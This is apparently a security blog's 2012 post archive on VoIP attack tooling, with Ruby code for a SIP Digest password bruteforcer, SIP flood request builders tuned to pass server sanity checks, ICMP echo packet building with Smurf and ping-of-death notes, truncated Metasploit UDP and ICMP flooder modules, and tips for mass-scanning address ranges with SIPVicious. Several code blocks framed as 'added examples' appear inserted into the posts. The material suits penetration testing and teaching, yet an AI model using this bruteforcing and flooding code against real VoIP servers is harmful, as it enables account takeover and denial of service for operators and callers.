
Posts

Showing posts from 2012

Fixing some SIP related Metasploit modules

Hi again. While I was checking some demos for our class at Vigo University, representing Quobis, I noticed that the Metasploit options.rb module (SIP scanning) wasn't working correctly: it was unable to recognize a Kamailio server. The next two pictures show the difference from the SIPVicious output. Some time ago I wrote a post about this module and I remember being a bit surprised because the code doesn't respect the SIP protocol at all (but it worked with Asterisk). A quick look at the Kamailio logs confirmed my suspicions: the sanity module was doing its job correctly and dropping these packets. :) The next function defines how requests are created in the current module; if you are familiar with the SIP RFC you will probably notice what I'm talking about. If not, I suggest comparing it with the create_request function of my sipflood.rb module.

    def create_probe(ip)
        suser = Rex::Text.rand_text_alphanumeric(rand(8)+1)
        shost = Rex::Socket.source_addr

VoIP class at Vigo University

My colleague Antón (@AntonRoman) and I visited the Telecommunication Engineering School at Vigo University last Monday to give a talk about VoIP, the technologies and the projects we are involved in at Quobis. As in the previous year, we were invited by Martín López Nores, the professor of the "Switching laboratory" subject, to prepare a Kamailio practical exercise. Antón started by explaining some basic VoIP concepts and then went through more advanced ones, mainly focused on the Kamailio SIP server (slides). Then I gave a review and a demo of the most common VoIP attack vectors that we find every day "in the wild" and their available countermeasures (slides). As in the last course, we extended the mandatory practice with an optional exercise (you can download them from the links below):
- 2011-2012
- 2012-2013
We encourage the students to give it a try; I strongly believe this practice could be very useful for their professional future. In fact,  An

Bruteforcing SIP extensions with Metasploit

Hi, some time ago I published this post about VoIP information gathering with Metasploit. For a minimal pentesting process, a module capable of bruteforcing the passwords of the discovered extensions is needed, so I have developed one; if you know the SIPVicious suite, this module provides the features of its svcrack tool. Based on the available SIP related modules I implemented the SIP Digest Authentication algorithm, and the Msf::Auxiliary::AuthBrute mixin does the magic with the possible user/password combinations. This picture shows an example of use in which the password of extension 100 is discovered (it is 100). Source code: UDP version, TCP version. If you use the module outside a LAN, it is strongly recommended to set your external IP address (option "EXTIP") to avoid SIP and NAT problems. Bye ;)
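To make the Digest part concrete, here is an added example (my own code, not the module's) of the computation a SIP bruteforcer loops over: it derives the response with the RFC 2617 formulas that RFC 3261 reuses, parses a 401 challenge, builds the Authorization header for the retried REGISTER and, given a parsed Authorization header, finds which candidate password reproduces its response. The Asterisk-style challenge, the extension 100 and the candidate passwords are constructed for the example; the RFC 2617 test vector (user Mufasa, password "Circle Of Life") is only there to check the arithmetic.

```ruby
require 'digest/md5'
require 'securerandom'

# HA1 = MD5(user:realm:password), HA2 = MD5(method:uri),
# response = MD5(HA1:nonce:HA2)                 without qop
#          = MD5(HA1:nonce:nc:cnonce:qop:HA2)   with qop=auth
def digest_response(user, realm, password, method, uri, nonce,
                    qop: nil, nc: '00000001', cnonce: nil)
  ha1 = Digest::MD5.hexdigest("#{user}:#{realm}:#{password}")
  ha2 = Digest::MD5.hexdigest("#{method}:#{uri}")
  if qop
    Digest::MD5.hexdigest("#{ha1}:#{nonce}:#{nc}:#{cnonce}:#{qop}:#{ha2}")
  else
    Digest::MD5.hexdigest("#{ha1}:#{nonce}:#{ha2}")
  end
end

# Parse the parameter list of a WWW-Authenticate or Authorization header value.
def parse_digest_params(value)
  params = {}
  value.sub(/\ADigest\s+/i, '').scan(/([A-Za-z]+)=(?:"([^"]*)"|([^,\s]+))/) do |k, quoted, bare|
    params[k.downcase] = quoted || bare
  end
  params
end

# Authorization header the client sends on the retried REGISTER.
def build_authorization(user, password, method, uri, challenge, cnonce: nil)
  qop = nil
  if challenge['qop']
    qop = 'auth' if challenge['qop'].split(',').map(&:strip).include?('auth')
  end
  cnonce ||= SecureRandom.hex(4) if qop
  resp = digest_response(user, challenge['realm'], password, method, uri,
                         challenge['nonce'], qop: qop, cnonce: cnonce)
  parts = [%(username="#{user}"), %(realm="#{challenge['realm']}"),
           %(nonce="#{challenge['nonce']}"), %(uri="#{uri}"),
           %(response="#{resp}"), 'algorithm=MD5']
  parts += ["qop=#{qop}", 'nc=00000001', %(cnonce="#{cnonce}")] if qop
  parts << %(opaque="#{challenge['opaque']}") if challenge['opaque']
  "Digest #{parts.join(', ')}"
end

# Given the parsed Authorization header of one observed request, return the
# candidate password that reproduces its response (nil if none does). A live
# bruteforcer runs the same loop but sends each candidate in a new REGISTER.
def crack_digest(method, auth, candidates)
  candidates.find do |pw|
    digest_response(auth['username'], auth['realm'], pw, method, auth['uri'],
                    auth['nonce'], qop: auth['qop'], nc: auth['nc'],
                    cnonce: auth['cnonce']) == auth['response']
  end
end

# Constructed 401 challenge in the style Asterisk sends (not a capture).
CHALLENGE = parse_digest_params('Digest realm="asterisk", nonce="46f2a4b8", algorithm=MD5')
```

Usage: `auth = build_authorization('100', '100', 'REGISTER', 'sip:192.0.2.10', CHALLENGE)` produces the header the phone would send; `crack_digest('REGISTER', parse_digest_params(auth), %w[1234 secret 100])` returns "100". Note that the nonce is chosen by the server and can change on every challenge, so an online bruteforcer must recompute the response for each REGISTER rather than reuse one.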

Flooding Asterisk, Freeswitch and Kamailio with Metasploit

Hi, it has been a long time since my last post because of my new job and my final year project ("VoIP denial of service attacks", for the curious), but there is something I found during my tests with Freeswitch, Kamailio and Asterisk that I want to share. NOTE: by the way, the guys at the Security By Default blog have published two articles by us (my good friend Roi Mallo and me) about how to develop modules for the Metasploit framework, and another two are coming. ;) During my project, among other things, I developed a Metasploit module which can flood the SIP protocol with common frames (INVITE, OPTIONS, REGISTER, BYE). I wrote it at Quobis (nice job ;) for some private tests because the existing software didn't fit our needs, so we are going to test how different GPL VoIP servers behave against this kind of attack:
- Asterisk: I think it needs no introduction, the famous softswitch/PBX software.
- Freeswitch: It's a newer softswitch that seems to be Asterisk replacement
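The frames such a flooder sends, like the probe of the scanner discussed in the "Fixing some SIP related Metasploit modules" post above, only have an effect if the target accepts them: a strict server such as Kamailio with the sanity module loaded drops requests that lack the headers RFC 3261 makes mandatory. As an added example, not code from either module, here is a builder for compliant OPTIONS/REGISTER/INVITE/BYE requests together with a checker that approximates the kind of tests a sanity module performs (my reading of RFC 3261, not Kamailio's rules). The via_host parameter is the address the target answers to, the same idea as SIPVicious -x or the EXTIP option. The addresses and the BAD_PROBE request are constructed for the example.

```ruby
require 'securerandom'

# Build an RFC 3261 request with every header a strict server expects.
# via_host is the address the target will answer to: behind NAT it must be
# your public IP (the same idea as SIPVicious -x or the EXTIP option).
def build_sip_request(method, target_ip, via_host, target_port: 5060,
                      from_user: 'msf', to_user: nil, sdp: false)
  to_user ||= from_user
  branch  = "z9hG4bK#{SecureRandom.hex(8)}"       # branch MUST carry the magic cookie
  call_id = "#{SecureRandom.hex(16)}@#{via_host}"
  body    = ''
  if sdp                                           # minimal offer for INVITE floods
    body = "v=0\r\no=- 0 0 IN IP4 #{via_host}\r\ns=-\r\nc=IN IP4 #{via_host}\r\n" \
           "t=0 0\r\nm=audio 4000 RTP/AVP 0\r\n"
  end
  headers = [
    "Via: SIP/2.0/UDP #{via_host}:5060;branch=#{branch};rport",
    'Max-Forwards: 70',
    "From: <sip:#{from_user}@#{via_host}>;tag=#{SecureRandom.hex(4)}",
    "To: <sip:#{to_user}@#{target_ip}>",
    "Call-ID: #{call_id}",
    "CSeq: 1 #{method}",
    "Contact: <sip:#{from_user}@#{via_host}:5060>",
    (sdp ? 'Content-Type: application/sdp' : nil),
    "Content-Length: #{body.bytesize}"
  ].compact
  "#{method} sip:#{target_ip}:#{target_port} SIP/2.0\r\n#{headers.join("\r\n")}\r\n\r\n#{body}"
end

# Approximation of the checks a strict server (e.g. Kamailio's sanity module)
# runs before answering; my reading of RFC 3261, not the module's own rules.
# Returns the list of problems found, empty for an acceptable request.
def sip_sanity_problems(raw)
  problems = []
  head, body = raw.split("\r\n\r\n", 2)
  body ||= ''
  lines = head.split("\r\n")
  m = lines.shift.to_s.match(%r{\A([A-Z]+) (\S+) SIP/2\.0\z})
  problems << 'malformed request line' unless m
  method = m && m[1]
  problems << 'Request-URI scheme is not sip/sips' if m && m[2] !~ /\Asips?:/
  hdrs = Hash.new { |h, k| h[k] = [] }
  lines.each do |l|
    name, value = l.split(':', 2)
    hdrs[name.strip.downcase] << value.strip if value
  end
  %w[via from to call-id cseq max-forwards].each do |h|
    problems << "missing #{h}" if hdrs[h].empty?
  end
  via = hdrs['via'].first.to_s
  problems << 'Via is not SIP/2.0' unless via.start_with?('SIP/2.0/')
  problems << 'Via branch lacks z9hG4bK cookie' unless via =~ /;branch=z9hG4bK/
  problems << 'From has no tag' unless hdrs['from'].first.to_s =~ /;tag=/
  cseq = hdrs['cseq'].first.to_s.match(/\A(\d+) ([A-Z]+)\z/)
  if cseq.nil?
    problems << 'malformed CSeq'
  elsif method && cseq[2] != method
    problems << "CSeq method #{cseq[2]} does not match #{method}"
  end
  cl = hdrs['content-length'].first
  if cl && cl.to_i != body.bytesize
    problems << "Content-Length #{cl} does not match body of #{body.bytesize} bytes"
  end
  problems
end

# Constructed probe of the kind a sanity module drops: no branch cookie,
# no From tag, no Max-Forwards and a CSeq method that does not match.
BAD_PROBE = "OPTIONS sip:192.0.2.10 SIP/2.0\r\n" \
            "Via: SIP/2.0/UDP 198.51.100.7:5060;branch=abcd\r\n" \
            "From: <sip:msf@198.51.100.7>\r\n" \
            "To: <sip:192.0.2.10>\r\n" \
            "Call-ID: 1234@198.51.100.7\r\n" \
            "CSeq: 1 INVITE\r\n" \
            "Content-Length: 0\r\n\r\n"
```

`sip_sanity_problems(build_sip_request('OPTIONS', '192.0.2.10', '198.51.100.7'))` is empty, while `sip_sanity_problems(BAD_PROBE)` lists four problems. Running the checker over your own probes before pointing a scanner or flooder at a Kamailio is a cheap way to tell "the target is not there" from "the target is silently dropping me".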

Scanning the world with Sipvicious

Hi, I'm scanning a large number of ranges with SIPVicious ("svmap.py") and I would like to share some tips which helped me during the process:
- The use of sessions (-s) and reports ("svreport.py") is necessary to keep the data obtained from different scans separate.
- It's a good idea to scan not only port 5060; you should add the following ports too, because some sysadmins configure their SIP services to run there (-p5060-5065).
- There is a well known "problem" with SIP and NAT; if you have ever installed an Asterisk you have surely heard about it :(, so we need to tell SIPVicious our external IP address with the (-x) parameter. Moreover, port 5060 (SIPVicious' outgoing port) has to be forwarded to the host that is scanning, and if you are scanning with more than one instance at the same time the following ports have to be forwarded too. I usually put the host in the DMZ to avoid these problems.
- "svreport.py" tries to make a DNS lookup with the discovered

Another simple Metasploit module: ICMP Flooder

Hi again! I said I was going to develop VoIP related Metasploit modules, but I was reading the PacketFu documentation and found that writing an ICMP flooder couldn't be too complicated at this point, so I am sharing this code too. I decided to include SHOST and SIZE options to get a more flexible module able to produce different flavors of this attack, such as ping flood, Smurf or ping of death. The next pictures show the module in the same way as in the last post. Code:
-------------------------------------------------------------------------
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Auxiliary::Dos
  include Msf::Exploit::Capture

  def initialize
    super(
      'Name'        => 'ICMP Flooder',
      'Description' => 'A simple ICMP flooder',
      'Author'      => 'Jesus Perez',
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 0 $'
    )
    register_opt
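Since the listing above is cut off, here is an added example (my own code, not the module's) of the ICMP layer such a module hands to PacketFu: an echo request builder parametrized by the payload SIZE, with the RFC 1071 Internet checksum the receiving kernel verifies before it answers. Spoofing SHOST (a Smurf puts the victim's address as source and sends to a broadcast address) and the oversize datagram of a ping of death live in the IP header, which PacketFu fills in and this block deliberately leaves out. The id, sequence and size values are constructed; the 8-byte checksum vector is the one RFC 1071 itself uses.

```ruby
# RFC 1071 Internet checksum: one's-complement sum of 16-bit words, complemented.
# An odd trailing byte is padded with a zero byte, as the RFC prescribes.
def inet_checksum(bytes)
  data = bytes.b
  data += "\x00".b if data.bytesize.odd?
  sum = data.unpack('n*').inject(0, :+)
  sum = (sum & 0xffff) + (sum >> 16) while sum > 0xffff   # fold carries back in
  (~sum) & 0xffff
end

# ICMP echo request (type 8, code 0) with 'size' bytes of payload. This is the
# ICMP layer only: the (spoofable) source address, the broadcast destination of
# a Smurf and the oversize datagram of a ping of death belong to the IP layer,
# which the Metasploit module leaves to PacketFu.
def build_icmp_echo(id, seq, size)
  payload = Array.new(size) { |i| i & 0xff }.pack('C*')   # deterministic filler
  header  = [8, 0, 0, id, seq].pack('CCnnn')              # checksum field zeroed
  csum    = inet_checksum(header + payload)
  [8, 0, csum, id, seq].pack('CCnnn') + payload
end

# What a receiver does: the checksum over the whole message must come out to 0,
# otherwise the echo request is discarded and the flood does no work.
def icmp_checksum_ok?(pkt)
  inet_checksum(pkt).zero?
end
```

`build_icmp_echo(0x1234, 1, 56)` returns the 64-byte message a normal `ping` sends; a module would prepend the IP header (with SHOST as source) and write it to the interface. The filler is deterministic on purpose: a random payload costs CPU on the sender for no extra effect on the target.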

My first Metasploit module: UDP Flooder

There are very few VoIP related Metasploit modules, neither auxiliaries nor exploits, so I plan to write some of them in my free time. Today I want to share a UDP flooder auxiliary module, which is very simple but perfect for learning; UDPFlooder is one of the many tools covered in the "Hacking VoIP Exposed" book, considered a reference in this field. Code:
-------------------------------------------------------------------------
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Auxiliary::Dos
  include Msf::Exploit::Capture

  def initialize
    super(
      'Name'        => 'UDP Flooder',
      'Description' => 'A simple UDP flooder',
      'Author'      => 'Jesus Perez',
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 0 $'
    )
    register_options(
      [
        Opt::RPORT(5060),
        OptAddress.new('SHOST', [false, 'The spoofable sourc